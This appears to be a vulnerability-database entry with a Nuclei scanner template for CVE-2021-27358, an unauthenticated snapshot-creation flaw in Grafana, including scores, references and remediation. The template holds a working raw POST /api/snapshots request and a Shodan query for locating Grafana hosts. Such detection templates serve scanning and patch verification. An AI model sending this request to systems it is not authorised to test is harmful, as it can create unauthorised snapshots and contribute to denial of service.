ProjectDiscoveryNUCLEI:CVE-2021-27358Grafana Unauthenticated Snapshot Creation
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.4 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.024 Low
EPSS
Percentile
89.8%
Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
id: CVE-2021-27358
info:
name: Grafana Unauthenticated Snapshot Creation
author: pdteam,bing0o
severity: high
description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
impact: |
An attacker can create snapshots of sensitive data without authentication, potentially leading to unauthorized access and data exposure.
remediation: |
Upgrade to the latest version of Grafana that includes a fix for CVE-2021-27358 or apply the provided patch to mitigate the vulnerability.
reference:
- https://phabricator.wikimedia.org/T274736
- https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/
- https://nvd.nist.gov/vuln/detail/CVE-2021-27358
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md#742-2021-02-17
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2021-27358
cwe-id: CWE-306
epss-score: 0.02415
epss-percentile: 0.89689
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
tags: cve2021,cve,grafana,unauth
http:
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"deleteUrl":'
- '"deleteKey":'
condition: and
- type: word
part: header
words:
- "application/json"
# digest: 4b0a00483046022100a246c958300ef66facdc279038dc6c006e6f25ee083e21d2b61f2c05f97608bf0221008541a137b7ea439c0235149d62f678ad167cb4386a17f4d1a8f94bc9ca3ff0a3:922c64590222798bb761d5b6d8e72950Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.4 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.024 Low
EPSS
Percentile
89.8%